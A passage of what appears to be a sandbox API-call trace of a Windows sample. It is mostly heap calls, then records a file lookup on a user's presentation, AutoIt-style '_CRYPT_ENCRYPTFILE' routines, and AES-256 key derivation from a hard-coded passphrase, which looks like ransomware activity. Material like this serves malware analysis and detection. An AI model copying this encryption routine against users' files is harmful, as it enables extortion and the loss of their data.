(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0078.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0078.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.374] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0078.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.471] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.471] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.471] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0078.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0078.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0078.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0078.474] CloseHandle (hObject=0x258) returned 1 [0078.474] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.474] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0078.474] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\z_HKc3lg6.pptx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa95ebd80, ftCreationTime.dwHighDateTime=0x1d59c9b, ftLastAccessTime.dwLowDateTime=0x5bc02500, ftLastAccessTime.dwHighDateTime=0x1d5bb04, ftLastWriteTime.dwLowDateTime=0x5bc02500, ftLastWriteTime.dwHighDateTime=0x1d5bb04, nFileSizeHigh=0x0, nFileSizeLow=0xf755, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="z_HKc3lg6.pptx", cAlternateFileName="Z_HKC3~1.PPT")) returned 0x41ac500 [0078.474] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0078.474] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.474] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.474] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0078.474] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0078.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0078.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0078.475] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0078.475] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0078.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.475] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0078.475] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.475] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.476] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca718, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0078.476] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.476] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.476] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca928, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0078.476] CryptHashData (hHash=0x41ac540, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0078.476] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.476] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca568, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0078.476] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac180) returned 1 [0078.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.494] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0078.494] CryptDestroyHash (hHash=0x41ac540) returned 1 [0078.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0078.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0078.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0078.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 